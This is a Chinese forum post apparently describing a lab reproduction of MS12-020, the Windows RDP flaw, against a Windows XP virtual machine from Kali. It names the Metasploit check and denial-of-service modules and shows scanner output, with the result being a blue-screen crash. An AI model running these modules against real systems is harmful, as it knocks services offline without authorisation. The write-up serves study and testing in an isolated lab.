3 人签到
    搜索
    Hi~登录注册
    查看: 46|回复: 0
    收起左侧

    ms12-020复现-xp蓝屏

    [复制链接]

    4

    主题

    0

    精华

    51 小时

    在线时间

    密圈

    积分
    26
    发表于 5 天前 | 显示全部楼层 |阅读模式

    漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)

    介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。

    靶机:xp   192.168.45.158
    攻击机:kali  192.168.45.155

    1  用nmap扫描一下靶机有没有开启3389
    ms12-020复现-xp蓝屏

    ms12-020复现-xp蓝屏
    2. 扫描之后发现3389是开放的,然后启动msfconsole, 利用里面的模块查看是否存在Ms12-020漏洞。
    使用 use auxiliary/scanner/rdp/ms12_020_check模块,建立目标地址
    ms12-020复现-xp蓝屏

    验证 run

    ms12-020复现-xp蓝屏
    存在这个漏洞 ,有效
    [+] 192.168.45.158:3389   - 192.168.45.158:3389 - The target is vulnerable.
  • 192.168.45.158:3389   - Scanned 1 of 1 hosts (100% complete)
  • Auxiliary module execution completed


    3.  存在这个漏洞
    直接利用蓝屏模块
    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    ms12-020复现-xp蓝屏

    查看需要设置什么参数

    ms12-020复现-xp蓝屏

    开始攻击 run
    ms12-020复现-xp蓝屏

    4. 攻击成功

    ms12-020复现-xp蓝屏




    上一篇:彩虹秒赞后门利用教程
    下一篇:DVWA 之low级别sql注入
  • 回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表